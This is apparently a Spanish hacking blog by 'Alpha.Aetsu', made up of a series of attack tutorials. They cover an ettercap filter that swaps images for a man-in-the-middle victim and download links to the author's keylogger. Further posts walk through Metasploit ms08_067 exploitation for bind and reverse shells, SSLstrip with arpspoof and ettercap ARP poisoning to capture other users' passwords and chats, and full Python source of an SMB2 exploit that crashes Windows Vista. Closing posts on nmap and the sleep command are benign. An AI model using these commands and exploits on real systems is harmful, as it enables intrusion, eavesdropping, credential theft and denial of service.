Filtro cambiar imagenes ettercap

Este filtro se utiliza para cambiar las imagenes de la maquina a la que le hayamos hecho el man in the middle.

Primero tenemos que obtener el script del filtro, para esto vamos a la siguiente pagina y copiamos el script.

     http://www.irongeek.com/i.php?page=security/ettercapfilter

El script es el siguiente:

Código:

   

############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                             #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
   # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

    
Ahora modificamos la dirección de las imagenes por las que nosotros quramos, por ejemplo la de portalhacker.n et, quedaria asi:

Código:

if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
   replace("IMG SRC=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
   msg("Filter Ran.\n");
}

Lo siguiente sera guardar el script con extension .filter, por ejemplo imagen.filter.

Una vez hecho esto abrimos una consola y vamos al directorio donde tenemos el imagen.filter. Una vez alli ponemos y se compilara el filtro:

        etterfilter imagen.filter -o imagen.ef  

Con esto nos generara el imagen.ef. Una vez creado lo copiaremos al directorio de ettercap
        /usr/share/ettercap

Ahora arrancamos ettercap y realizamos el MITM. Durante el MITM vamos a la pestaa filters->load a filter.
Una vez aqui seleccionamos el archivo imagen.ef y pulsamos aceptar. Con esto ya estar el filtro aplicado y las imagenes que vea la victima seran sustituidas por las que nosotros queramos.


fuente:      http://www.irongeek.com/i.php?page=security/ettercapfilter

by Aetsu

morsa-Keylogger v1.7

Última versión del morsa-keylogger. Se ha añadido la opción para ver los parametros del servidor ftp y se ha optimizado el menú.

 

Codigo ( .cpp)

https://sourceforge.net/projects/morsa-keylogger/files/morsa-keylogger%20v1.7.cpp/download

Ejecutable ( .exe)

https://sourceforge.net/projects/morsa-keylogger/files/morsa-keylogger%20v1.7.exe/download

Directorio de los archivos:

http://sourceforge.net/projects/morsa-keylogger/files/

by Alpha.Aetsu

Morsa-Keylogger v1.6

Esta versión corrige algunos bugs encontrados en la versión anterior.

Codigo ( .cpp)

https://sourceforge.net/projects/morsa-keylogger/files/Morsa-Keylogger%20v1.6.cpp/download

Ejecutable ( .exe)

https://sourceforge.net/projects/morsa-keylogger/files/Morsa-Keylogger%20v1.6.exe/download

Directorio de los archivos:

http://sourceforge.net/projects/morsa-keylogger/files/

Morsa-keylogger v1.5

 Nueva versión del keylogger desarrollado por mi con la mejora implementada que ofrece la posibilidad de configurar el keylogger desde el ejecutable.
 Las próximas mejora programadas seran correccion de bugs y la version 2.0 y última poseera ya interfaz gráfica, aunque dicha versión no tiene fecha de salida proxima.

Codigo ( .cpp)

https://sourceforge.net/projects/morsa-keylogger/files/morsa-keylogger%20v1.5.cpp/download

Ejecutable ( .exe)

https://sourceforge.net/projects/morsa-keylogger/files/morsa-keylogger%20v1.5.exe/download

Directorio de los archivos:

http://sourceforge.net/projects/morsa-keylogger/files/

Alpha Aetsu

TUTORIAL METASPLOIT puerto 445

 Hoy vamos ha intentar introducirnos en un ordenador de nuestra LAN que utilice Windows XP aprovechando el puerto 445, es decir, obtendremos una shell en un XP de nuestra red local aprovechando el puerto 445 utilizado para compartir archivos e impresoras.
 Para hacer esto utilizaremos el metasploit, que podriamos definir como un gran compendio de exploits. Para este tutorial el atacante utilizara Backtrack 4 pre-final, pero explicaré como instalarlo en ubuntu. Respecto a su utilizacion es identica en ambos.

Primero, ¿como instalamos metasploit en ubuntu?

Pues necesitaremos tener instaladas las siguientes librerias:

    sudo apt-get install ruby libruby rdoc
    sudo apt-get install libyaml-ruby
    sudo apt-get install libzlib-ruby
    sudo apt-get install libopenssl-ruby
    sudo apt-get install libdl-ruby
    sudo apt-get install libreadline-ruby
    sudo apt-get install libiconv-ruby
    sudo apt-get install rubygems *

El paquete rubygems tiene que ser descargado manualmente de

  http://rubyforge.org/frs/?group_id=126

A continuación para poder tener el metasploit actualizado tenemos que instalar subversion
   
    sudo apt-get install subversion

Ahora descargamos el metasploit de
   
  http://metasploit.com/framework/

también hay una version para windows, lo que no la he utilizado, pero supongo que será similar.

Para concluir la instalación abrimos la carpeta del metasploit y ponemos

      sudo svn update

con esto ya deberiamos tener el metasploit funcionando.


Segundo, ¿ como encontramos a nuestras víctimas?

 Muy fácil, utilizamos por ejemplo nmap para ver los ordenadores de nuestra LAN:

                 # nmap -sSV 192.168.1.0/24

Con esto se nos mostrarán todos los host de nuestra red, además de sus puertos abiertos, el servicio que utilizan dichos puertos y el SO de los ordenadores.


Tercero, ya tenemos el objetivo localizado, el metasploit descargado e instalado y  ahora, ¿que coño hacemos con esto?

Bueno abrimos la carpeta del metasploit y:
                                 
                 ./msfconsole

Tardaraá un poco pero nos mostrara una bonita pantalla de presentación y con ello el metasploit corriendo.

A continuacion pasare a explicar la utilizacion de dos exploits que aprovechan la vulnerabilidad en este puerto. Ambos son de muy similar utilización, pero el segundo permite tambien conexiones através de internet (no lo veremos en este articulo).




Primer exploit:

1 -  Ponemos:
                 
              use windows/smb/ms08_067_netapi

 

2 - Ahora podemos ver los payloads de que disponemos con:

            

                show payloads

3 – A continuación seleccionamos el payload con:

    

                  set payload windows/shell_bind_tcp

4 - Podemos ver las opciones del payload con:

      
                   show options

5 - Seleccionamos la ip objetivo:

                 set RHOST {ip_objetivo}

6 - Y por último lanzamos el exploit:

                   exploit

Con todo esto ya tendriamos una shell en el sistema víctima sin que nuestro objetivo se diese cuenta.

EN RESUMEN:

                # nmap -sSV 192.168.1.0/24

                  use windows/smb/ms08_067_netapi

                  set payload windows/shell_bind_tcp

                  set RHOST {ip_objetivo}

                  exploit




Segundo exploit:

1 -  Ponemos:
                 
              use windows/smb/ms08_067_netapi

       

2 - Ahora podemos ver los payloads de que disponemos con:
       
                show payloads

3 – A continuación seleccionamos el payload con:

                set payload windows/shell_reverse_tcp

4 - Podemos ver las opciones del payload con:
     
               show options

5 - Seleccionamos la ip objetivo:

                  set rhost {ip_objetivo}

6 - Ponemos nuestra ip:

                   set lhost {nuestra_ip}

7 - Y por último lanzamos el exploit:

                    exploit

Con todo esto ya tendriamos una shell en el sistema víctima sin que nuestro objetivo se diese cuenta.

EN RESUMEN:

                # nmap -sSV 192.168.1.0/24

                    use windows/smb/ms08_067_netapi

                    set payload windows/shell_reverse_tcp

                    set rhost {ip_objetivo}

                    set lhost {nuestra_ip}

                    exploit

Alpha Aetsu

Tutorial SSLstrip

SSLstrip nos permite sniffar usuarios y contraseñas encriptadas en HTTPS. Esto lo hace realizando un ataque MITM entre el servidor y nuestro objetivo conectandose al servidor mediante HTTP (sin encriptar) en lugar de HTTPS (encriptado) con lo que los datos son visibles. Algunos ejemplos de páginas que utilizan esta encriptacion son Gmail, Hotmail o Tuenti.

Bueno primero nos descargamos un script en python desde

             http://www.thoughtcrime.org/software/sslstrip/index.html

o la descarga directa

             http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

Una vez descargado lo extraemos y obtendremos como resultado una carpeta llamada sslstrip-0.6 (la version actual).

A continuación abrimos una shell y ponemos:

              echo "1" > /proc/sys/net/ipv4/ip_forward

ahora realizamos el ataque MITM

             # arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}

a modo de  ejemplo

             #  arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1

abrimos otra shell y cambiamos la redireccion de puertos usando las iptables

            # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

 una vez echo lo anterior lanzamos el SSLstrip    

     # python sslstrip.py -w {nombre_del_archivo_de_captura}

a modo de  ejemplo

         # python sslstrip.py -w morsa

volvemos a abrir otra shell si queremos ver en tiempo real la informacion obtenida

         # tail -f {nombre_del_archivo_de_captura}

a modo de  ejemplo

         # tail -f morsa

Para terminar si posteriormente queremos ver los archivos del fichero de captura hacemos

       nano {nombre_del_archivo_de_captura}

o a modo de  ejemplo

         # nano morsa

Bueno esto es todo relativo al SSLstrip un saludo y nos vemos.

Alpha.Aetsu

       

Manual básico ettercap (entorno grafico)

 Hoy hablaremos de ettercap, un programa que nos permite sniffar el trafico de red y obtener asi las contraseñas escritas por otros usuarios de nuestra red, además también permite leer, por ejemplo, las conversaciones del messenger u otros programas de mensajeria instantánea.

1 - Primero tenemos que descargar el ettercap, la ultima version es la 0.7.3 y
esta disponible tanto para windows como para linux.

         Windows:

                     http://sourceforge.net/projects/ettercap/files/unofficial%20binaries/windows/

         Linux:
                   

                     http://ettercap.sourceforge.net/download.php

          o (en el caso de ubuntu)

                     # apt-get install ettercap-gtk

2 - Lo instalamos.

Si tienes la versión para compilar de linux:

         # ./configure
         # make
         # make install

3 - Arrancamos el ettercap (en caso de linux como root, ya que sino no nos permitira seleccionar la interfaz de red a utilizar).

3b - Si queremos arrancarlo desde una shell (en caso de linux):
     
       sudo ettercap -C

4 - Pestaña Sniff>Unified Sniffing

5 - Seleccionamos la interfaz que esta conectada a la red que queremos sniffar,
despues le damos a "Aceptar".

6 - Pestaña Host>Scan for hosts.
En la parte de abajo de la pantalla aparecera algo como " X hosts added to the hosts list..."
(X sera un numero correspondiente al numero de maquinas conectadas a la red).

7 - Pestaña Host>Host list.
Ahora apareceran las IPs de las maquinas conectadas, hay que tener en cuenta que el router también
aparece (No aparece nuestro PC).

8 - Si solo aparece la IP del router es que no hay nadie mas conectado (xD).

9 - Si aparecen mas IPs seleccionamos la IP del ordenador a atacar y pulsamos "Add to Target 1", después el router "Add to Target 2".


  Ahora ya tenemos los objetivos marcados, pero antes de dar el siguiente paso tenemos que tener en cuenta que vamos a utilizar una técnica llamada Man In The Middle (MITM) y lo que haremos sera que todos los paquetes que van dirigidos al PC atacado pasen por nosotros, con lo que si nosotros nos desconectamos sin detener el ataque MITM nuestra victima se quedara sin conexion hasta que reinicie el PC.

10 - Pestaña Mitm>ARP Poisoning. Ahora marcamos la pestaña "Sniff remote connections" y pulsamos "Aceptar".

11 - Pestaña Start>Start sniffing.

Con esto estaremos snifando el trafico de red.

12 - Pestaña View>Connections. Aqui podemos ver todas las conexiones y hacemos doble click sobre alguna podemos ver los datos que contiene, entre ellos conversaciones del messenger, usuarios y contraseñas, etc.

Ahora es cuestion de paciencia.

MUY IMPORTANTE!!!!
Cuando terminemos tenemos que hacer:

13 - Pestaña Start>Stop sniffing.

14 - Pestaña Mitm>Stop Mitm Attack(s).
Sino hacemos esto el PC atacado se quedara sin conexion hasta que reinicie.

                                                                                                                                                      Alpha.Aetsu

Cosas de nmap #2

  Hoy vamos a ver como saber los sistemas operativos y los puertos que tienen abiertos los ordenadores de nuestra red. Para realizar esta tarea utilizaremos nmap.
  Para hacer esto tenemos que abrir una shell en linux y poner:
        
                 sudo nmap -O 192.168.1.0/24
  Con esto se mostrarán todas las máquinas de la red con sus respectivos sistemas operativos, además se mostraran los puertos abiertos y los servicios que estos utilizan, información muy útil si despues queremos tener acceso a las victimas mediante exploits (en futuras entradas se vera la utilización de estos exploits).

Un saludo y nos vemos en futuras entradas.

Alpha.Aetsu

Grave vulnerabilidad encontrada en Windows vista y el futuro windows 7

Esta vulnerabilidad ha sido encontrada hace unos dias y afecta procotolo SMB, con lo que no se ha echo esperar mucho un exploit que la aprovecha, en este caso desarroyado por Laurent Gaffié en python. Aqui tenemos el exploit:

#!/usr/bin/python
# -*- coding: utf-8 -*-
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "Ip-victima", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Para utilizarlo (trabajando desde linux) copiamos y con cualquier editor de texto lo guardamos con el nombre que queramos y con extension .py (de python).

    Por ejemplo:

              morsa.py

Ahora ya tenemos el exploit, solo necesitamos una víctima, en mi caso dispongo de una máquina virtual vmware con Windows Vista SP1.

Bueno primero necesitamos la ip de la víctima, la podemos obtener ya sea por nmap o por cualquier otro método, en el caso de nmap seria:

             sudo nmap -sP -PI 192.168.1.0/24

Supongamos que la ip es 192.168.0.102 pues abrimos el exploit con el editor de texto plano (recomiendo kate) y editamos la línea que pone:

           host = "Ip-victima", 445

Aqui sustituimos Ip-victima por 192.168.0.102 con lo que quedaria


           host = "192.168.0.102", 445

Guardamos el exploit, nos dirigimos al directorio de este y abrimos una consola:

          python morsa.pl       

    

Al lanzar esto y esperar unos segundos veremos el bonito pantallazo azul en la maquina virtual:

Bueno con esto espero que quede clara la utilización del exploit y recordad que Windows Vista no requiere de exploits para que deje de funcionar correctamente, ya que, el por si solo ya lo hace y con mucho esmero.

Aclaraciones: Esta vulnerabilidad se basa en los recursos compartidos de la máquina víctima, si Windows Vista tiene deshabilitada la opción de compartir archivos e impresoras no funcionara.

Un saludo.

Alpha.Aetsu

Cosas de linux #2

 Hoy vamos a ver el comando sleep. La utilidad de este comando es poner nuestro ordenador a esperar y cuando pase un determinado tiempo realice una acción.
Vamos a ver la sintaxis:
         sleep {tiempo a esperar} {m(minutos) s(segundos)};{orden a realizar}

Ahora un ejemplo:
         sleep 100m; killall exaile

Lo que realiza esta orden es esperar 100 minutos y cuando transcurra ese tiempo cierra el reproductor de musica exaile.

También es útil cuando queremos apagar el ordenador en un tiempo concreto, pero, en este caso deberemos primero loggearnos como root, ya que sino transcurrido el tiempo nos pedira la autentificación y no apagará el ordenador.
Veamos el ejemplo:
         sudo su

         sleep 50m; shutdown -h 1

Con esta orden vemos que transcurridos los 50 minutos el sistema llama a la orden shutdown que apaga el ordenador, pero nos dara un margen de 1 minuto por si queremos cancelar el apagado (shutdown -a en una consola).

Esto es todo por ahora.

Un saludo.